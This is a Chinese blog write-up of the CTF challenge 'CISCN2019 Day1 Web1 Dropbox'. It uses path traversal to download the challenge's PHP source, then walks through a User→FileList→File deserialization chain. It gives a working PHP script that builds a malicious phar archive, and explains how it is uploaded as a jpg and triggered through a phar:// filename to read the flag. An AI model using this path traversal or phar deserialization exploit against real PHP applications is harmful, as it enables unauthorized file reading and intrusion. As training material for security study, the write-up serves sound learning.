BUUCTF [CISCN2019 华北赛区 Day1 Web1]Dropbox 1

最新推荐文章于 2023-06-05 14:32:49 发布
最新推荐文章于 2023-06-05 14:32:49 发布
阅读量1.1k 收藏 6
点赞数 2
分类专栏: ctf buuctf 刷题日记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45642610/article/details/118559247
版权
ctf 同时被 3 个专栏收录
27 篇文章 3 订阅
订阅专栏
buuctf
26 篇文章 2 订阅
订阅专栏
刷题日记
24 篇文章 2 订阅
订阅专栏

进入页面随便注册一个账号,登录。
在这里插入图片描述
随便上传一个图片。
用burpsuite拦截下载页面,里面有任意文件下载文件,可以下载源码。
在这里插入图片描述
../../index.php格式把index.php,download.php, delete.php下载,打开发现用到class.php,也下了。

#index.php
<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}
?>


<!DOCTYPE html>
<html>

<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>网盘管理</title>

<head>
    <link href="static/css/bootstrap.min.css" rel="stylesheet">
    <link href="static/css/panel.css" rel="stylesheet">
    <script src="static/js/jquery.min.js"></script>
    <script src="static/js/bootstrap.bundle.min.js"></script>
    <script src="static/js/toast.js"></script>
    <script src="static/js/panel.js"></script>
</head>

<body>
    <nav aria-label="breadcrumb">
    <ol class="breadcrumb">
        <li class="breadcrumb-item active">管理面板</li>
        <li class="breadcrumb-item active"><label for="fileInput" class="fileLabel">上传文件</label></li>
        <li class="active ml-auto"><a href="#">你好 <?php echo $_SESSION['username']?></a></li>
    </ol>
</nav>
<input type="file" id="fileInput" class="hidden">
<div class="top" id="toast-container"></div>

<?php
include "class.php";

$a = new FileList($_SESSION['sandbox']);
$a->Name();
$a->Size();
?>

#download.php
<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";
ini_set("open_basedir", getcwd() . ":/etc:/tmp");

chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) {
    Header("Content-type: application/octet-stream");
    Header("Content-Disposition: attachment; filename=" . basename($filename));
    echo $file->close();
} else {
    echo "File not exist";
}
?>


#delete.php
<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";

chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
    $file->detele();
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>


#class.php
<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);

class User {
    public $db;

    public function __construct() {
        global $db;
        $this->db = $db;
    }

    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }

    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }

    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;#files[File对象]
    private $results;#resules[filename][function]存function方法执行后的结果
    private $funcs;#funciton

    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);

        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);

        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);#     $file = true or false
            array_push($this->files, $file);# 把File对象加入到files数组
            $this->results[$file->name()] = array(); #results 是个数组,保存以我们上传的文件名作为键值,每个文件名键值映射一个数组
        }
    }

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) { #file就是每个我们上传文件的File对象
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
        $table .= '<thead><tr>';
        foreach ($this->funcs as $func) {
            $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
        }
        $table .= '<th scope="col" class="text-center">Opt</th>';
        $table .= '</thead><tbody>';
        foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">删除</a></td>';
            $table .= '</tr>';
        }
        echo $table;
    }
}

class File {
    public $filename;

    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }

    public function name() {
        return basename($this->filename);
    }

    public function size() {
        $size = filesize($this->filename);
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
        return round($size, 2).$units[$i];
    }

    public function detele() {
        unlink($this->filename);
    }

    public function close() {
        return file_get_contents($this->filename);
    }
}
?>

重点是class.php。
留意到File类的close()方法里有file_get_contents(),可以用来读取flag.txt。
怎么读取?
得先看看User类,他有销毁时自动调用的魔术方法 __destruct() {$this->db->close();}。调用db变量的close()方法。此时如果db是FileList对象,则因为FileList类没有close()方法,会自动调用__call($func, $args)方法。

__call() 当所调用的成员方法不存在(或者没有权限)该类时调用有。两个参数,
 第一个参数是,调用这个不存在的方法的方法名,
 第二个参数是,调用这个不存在的方法的方法参数(调用这个函数时的参数)
 public function __call($func, $args) {
        array_push($this->funcs, $func);#$funcs成员变量存放这个不存在的方法的方法名
        foreach ($this->files as $file) { #file就是每个我们上传文件的File对象
            $this->results[$file->name()][$func] = $file->$func();#results成员变量是个二维数组,
            #一维存放我们上传的文件名,
            #二维存放对应文件在调用不存在的方法后的结果,每个方法对应一个结果
        }
    }

最后一步有$file->$func(),即调用File对象($file存的是File对象,后文解释)里与这个不存在的方法名相同名字的方法。
因为这个方法名来自User类的close()方法,所以就调用了File对象的close() {return file_get_contents($this->filename);}。此时如果filename是flag.txt即可以读取里面的内容。

读取后怎么回显呢?
由FileList对象销毁时自动调用的魔术方法 __destruct()实现,里面输出了$table变量,$table变量里有成员变量存有刚刚读出flag.txt的信息。即这一句:

在这里插入图片描述
为什么?此时就要看FileList的成员变量存了什么。

精简了下创建时自动调用的魔术方法__construct
public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);#返回我们上传文件的所有文件名

        foreach ($filenames as $filename) {
            $file = new File();
            array_push($this->files, $file);# 把File对象加入到files数组
            $this->results[$file->name()] = array(); #results 是个数组,保存以我们上传的文件名作为键值,每个文件名键值映射一个数组。
            (这个数组在__call方法里存放调用不存在的方法后的结果。)
            具体看前文的__call方法代码的注释
        }
    }

所以此时,$filename对应我们上传的文件名,$result(一维数组)对应文件下所有调用不存在方法的结果(即成员变量$results的第二维),$value对应单个结果的具体值。所以根据__add最后一行的$this->results[$file->name()][$func] = $file->$func();$value可以存放读取flag.txt的结果。

foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">删除</a></td>';
            $table .= '</tr>';
        }

说了这么多,页面里我们可操作的就只有上传,下载,删除。因为要调用__destruct,所以只能删除。
但删除操作又怎么能回显flag呢?从最初的解题思路来看,问题就是怎么上传一个有User对象,User对象的db又是Filelist对象,而filename怎么赋值为flag.txt(怎么把对象保存到file成员变量里)等等,这里用的是phar伪协议。里面有个字段(meta-data)用来保存信息,它是序列化后的信息。而phar://伪协议可以让php一些函数自动反序列化这个字段信息,包括file_get_contents()。
payload:
在运行前要把php.ini里的phar字段里的phar.readonly改为phar.readonly = off把前面的分号去掉,还要重启本地服务器(phpenv等等)。

<?php
//phpinfo();

class User {
    public $db;
}

class File {
    public $filename;
}
class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct() {
        $file = new File();
        $file->filename = '/flag.php';
        $this->files = array($file);
        $this->results = array();
        $this->funcs = array();
    }
}

@unlink("phar.phar");#删除phar.phar
$phar = new Phar("phar.phar"); //后缀名必须为phar

$phar->startBuffering();#提高性能,好像不必要

$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub

$o = new User();
$o->db = new FileList();

$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("exp.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

运行后在同一路径下得到phar.phar文件,改后缀为jpg上传,点删除用burpsuite拦截,把filename=phar://phar.jpg,即可得到flag。
在这里插入图片描述

疑问
1.为什么任意文件下载不能直接把flag.txt下了?(或许是文件权限问题?)
2.flag文件为什么是txt。

参考
ciscn2019华北赛区半决赛day1_web1题解

__byb__
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
01Chapter1共28页.pdf.zip
11-19
很抱歉,根据您提供的信息,"01Chapter1共28页.pdf.zip" 和 "赚钱项目" 这些内容并没有直接关联到特定的IT知识点。标题和描述似乎指的是一个PDF文档的压缩文件,可能是一个电子书、教程或者课程资料的一部分,而标签...
[CISCN2019 华北赛区 Day1 Web1]Dropbox
weixin_63231007的博客
02-06 1381
一道联系紧密的phar反序列化
BUUCTF-WEBCISCN2019 华北赛区 Day1 Web1】Dropbox 1
qq_36410265的博客
02-08 306
反序列化
CISCN2019_华北赛区_Day1_Web1-Dropbox
抒情诗
10-23 359
好长时间没做web了,web狗太难了 首先得检讨一下,我竟然将近三天没做web题目了,这这这还是一个web狗应该做的吗?反思一下呜呜呜。。。 phar反序列化 什么是phar反序列化呢? 下面的文章可能会有点帮助来自jianshu 按照我的理解来说呢,就是把危险的文件上传到服务器?然后借助某些功能与危险函数实现危险的操作,太笼统了。具体来说呢就是php文件系统中很大一部分的函数在通过phar://解析时,存在着对meta-data(在这里<meta-data>区域面搞反序列化的pop链)反序列化
draw.io-21.6.1-windows-installer
07-07
《draw.io-21.6.1-windows-installer:图形绘制工具在Windows平台的应用与实践》 draw.io是一款流行的开源在线绘图工具,专为创建流程图、UML图、网络拓扑图、思维导图等多种图形而设计。其最新版本21.6.1针对...
现场签证单95287共1页.pdf.zip
12-01
很抱歉,根据您给出的信息,"现场签证单95287共1页.pdf.zip" 和 "赚钱项目" 并不直接关联到IT行业的具体知识点。"现场签证单"通常涉及建筑行业或工程项目管理,而"赚钱项目"则可能是指各种商业计划或投资机会,这些...
0x9E2A83C1_0x9E2A83C1_
10-02
1. **Download(下载)**: 这是互联网服务中常见的功能,允许用户从服务器获取数据或文件到他们的本地设备。实现这一功能通常需要服务器端的文件存储和传输协议,如HTTP或FTP。下载管理器可以优化这一过程,提供断点...
『CTF Web复现』BUUCTF-[CISCN2019 华北赛区 Day1 Web1]Dropbox
Ho1aAs‘s Blog
09-08 910
利用点:任意文件读取;phar反序列化POP链读取文件;绕过MIME文件上传;任意文件删除;phar://协议触发反序列化
[CTFTraining] CISCN 2019 华北赛区 Day1 Web1
ZXW_NUDT的博客
06-05 1817
[CTFTraining] CISCN 2019 华北赛区 Day1 Web1
ciscn2019华北赛区半决赛day1_web1题解
weixin_30776273的博客
08-07 440
感谢buuoj的大佬们搭建的复现环境。作为一位CTF的初学者,我会把每个题目的writeup都写的尽量详细,希望能帮到后面的初学者。 http://web42.buuoj.cn 文章会不定时继续完善,完善内容可能包括分析的错误、语病和文章结构等。 复现过程 进入解题页面发现需要登录,这里只需要注册一个账号然后登录即可。 登录以后是一个网盘的页面,最开始只有上传功能,并且只能上传pn...
代码审计 | [CISCN2019 华北赛区 Day1 Web1]Dropbox | phar反序列化实施远程代码攻击
crispr的博客
02-18 393
phar反序列化实施远程代码攻击 0X01 前言 记录一道CISCN的真题,让我对phar反序列化有更深层次的理解和应用,也对代码审计有了新的感悟,知道了在不使用php函数unserialize()同样引起PHP对象注入 参考链接: https://xz.aliyun.com/t/2715 https://www.cnblogs.com/kevinbruce656/p/11316070.html...
BUUCTF WEB DROPBOX
qq_41696858的博客
03-06 492
这题考的是phar文件的应用,说到底是考的反序列化洞,我们不能一直指望有UNSERIALIZE这种明显的反序列化洞,于是phar就是一种替代选择 phar文件的细节可以看这一篇文章 https://xz.aliyun.com/t/2715 关于这题的wp个人觉得这篇写的很详细 https://www.jianshu.com/p/5b91e0b7f3ac 理清楚了应该不是啥难事 简单来说phar就是一种压缩文件格式,因此使用phar的先决条件是得有文件上传功能 phar漏洞的触发条件或者说出触发代码在mani
dropbox python
最新发布
08-23
您好!要使用Python与Dropbox进行交互,您可以使用Dropbox的官方Python SDK - Dropbox API v2。这个SDK提供了一组Python函数和类,用于与Dropbox进行文件上传、下载、删除等操作。 您可以使用以下步骤来开始使用Dropbox Python SDK: 1. 首先,您需要安装Dropbox Python SDK。您可以使用pip命令来安装它: ``` pip install dropbox ``` 2. 接下来,您需要在Dropbox开发者门户(https://www.dropbox.com/developers/apps)上创建一个应用程序,以获取API密钥和密钥密钥。在创建应用程序时,选择"Scoped access"(有限访问)权限类型,并添加对应用程序文件的访问权限。 3. 在Python脚本中,导入`dropbox`模块并创建一个`Dropbox`对象: ```python import dropbox dbx = dropbox.Dropbox("<your_api_key>") ``` 4. 您现在可以使用`dbx`对象执行各种Dropbox操作。例如,要上传文件: ```python with open("local_file.txt", "rb") as f: dbx.files_upload(f.read(), "/remote_file.txt") ``` 要下载文件: ```python metadata, res = dbx.files_download("/remote_file.txt") with open("local_file.txt", "wb") as f: f.write(res.content) ``` 要列出特定文件夹中的文件: ```python result = dbx.files_list_folder("/folder_path") for entry in result.entries: print(entry.name) ``` 这只是Dropbox Python SDK的一小部分功能。您可以在Dropbox官方文档(https://dropbox-sdk-python.readthedocs.io/)中找到更多示例和详细信息。 希望这可以帮助到您!如果您还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值